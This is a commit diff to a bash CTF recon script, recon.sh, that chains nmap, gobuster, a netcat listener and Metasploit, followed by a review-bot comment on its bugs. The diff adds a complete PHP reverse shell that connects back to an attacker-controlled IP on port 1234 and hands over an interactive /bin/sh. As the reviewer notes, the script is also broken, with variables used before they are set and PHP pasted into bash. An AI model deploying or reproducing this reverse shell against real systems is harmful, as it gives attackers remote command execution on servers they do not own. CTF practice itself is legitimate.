Update recon.sh
palanioffcl authored Jan 25, 2022
1 parent dc8932d commit 8ad7350
Showing 1 changed file with 130 additions and 47 deletions.
177 changes: 130 additions & 47 deletions recon.sh
@@ -1,90 +1,173 @@
#!/bin/bash

#clear screen
red=`tput setaf 1`
blue=`tput setaf 4`
reset=`tput sgr0`

#clear screen
clear

#banner

echo " ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗::
::██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║::
::██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║███████║ ██║ ██║██║ ██║██╔██╗ ██║::
::██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║██╔══██║ ██║ ██║██║ ██║██║╚██╗██║::
::██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║::
::╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Made by Palani::::::::::::::::"
#banner
echo "${red}
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ██████╗████████╗███████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ::
:: ██╔════╝╚══██╔══╝██╔════╝██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ::
:: ██║ ██║ █████╗ ███████║ ██║ ██║██║ ██║██╔██╗ ██║ ::
:: ██║ ██║ ██╔══╝ ██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ::
:: ╚██████╗ ██║ ██║ ██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ::
:: ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ::
${blue}:::::::::::::::::::::::${reset}Made by Palani${blue}:::::::::::::::::::::::::::::::::
:: CTF + Automation ::
:: A Tool to Automate Enumeration and stuffs during CTFs. ::
:: Github : ${reset}github.com/palanioffcl${blue} ::
:: Twitter : ${reset}twitter.com/palanioffcl${blue} ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::${reset}"

#getting domain or ip address for recon

echo "Enter your IP or domain :"

read ip

#Checking whether its is a Valid domain or ip

count=$( ping -c 1 $ip | grep icmp* | wc -l )

if [ $count -eq 0 ]

then

echo "Host is Down. Cross check the IP or domain "

else

echo "Its up :)"

fi

# Nmap scan

echo nmap scan is started....
#Creating Required directories
mkdir ./$ip@$ondate
mkdir ./$ip@$ondate/reports/

nmap -sC -sV -oA "$ip" -p -o nmap_"$ip".txt
touch ./$ip@$ondate/reports/nmap.txt
touch ./$ip@$ondate/reports/gobuster.txt
touch ./$ip@$ondate/reports/nmap.txt
touch ./$ip@$ondate/report.html

# Nmap scan
echo nmap scan is started....
nmap -sC -sV -oA "$ip" -p -o nmap_"$ip".txt > ./$ip_on_$ondate/reports/nmap.txt
xdotool key alt+shift+right

xdotool key alt+right

# Gouster bruteforcing directories

echo gobuster is runnning....

gobuster dir -u http://"$ip"/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

gobuster dir -u http://"$ip"/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt > ./$ip_on_$ondate/reports/gobuster.txt
xdotool key alt+shift+down

xdotool key alt+down

# netcat to get the reverse shell

echo Started netcat to get shell

nc -nvlp "$ip" 1234

xdotool key alt+shift+left

xdotool key alt+left

# starting metasploit

echo opening Metasploit...

msfconsole

# opening web browser to view the website

firefox http://"$ip"

#opening required directories

mkdir ./$ip

#date when the scan was done
ondate=$(date +"%Y-%m-%d")


#Generating php reverse shell
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = "'''+ $tun_ip + '''\";
$port = 1234;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
#generate report
echo "
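Review bot: The report paths in the new code are built from `$ondate` before it is assigned, and the `./$ip_on_$ondate/reports/...` redirects on the nmap and gobuster lines are parsed by bash as the empty variable `$ip_on_` rather than `$ip` followed by `_on_`, so the `mkdir` calls create `./<ip>@` and the later redirects point at a directory that does not exist. Move `ondate=$(date +"%Y-%m-%d")` above the first `mkdir` and write the paths with braces and quotes, e.g. `"./${ip}_on_${ondate}/reports/nmap.txt"`. The `ip` value comes straight from `read ip` and is used unquoted in `ping`, `mkdir` and the path expressions; use `read -r ip` and reject anything that is not a hostname/IP shape (`[[ "$ip" =~ ^[A-Za-z0-9.-]+$ ]] || exit 1`) before it reaches the filesystem or a command line. The block from `<?php` to `?>` is not inside a heredoc, quoted string or separate file, so bash will try to execute each of those lines as shell commands, and the trailing `echo "` leaves an unterminated quote that makes the script fail to parse at that point; the file appears to end there, so whether `echo` was meant to continue cannot be told from this hunk.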
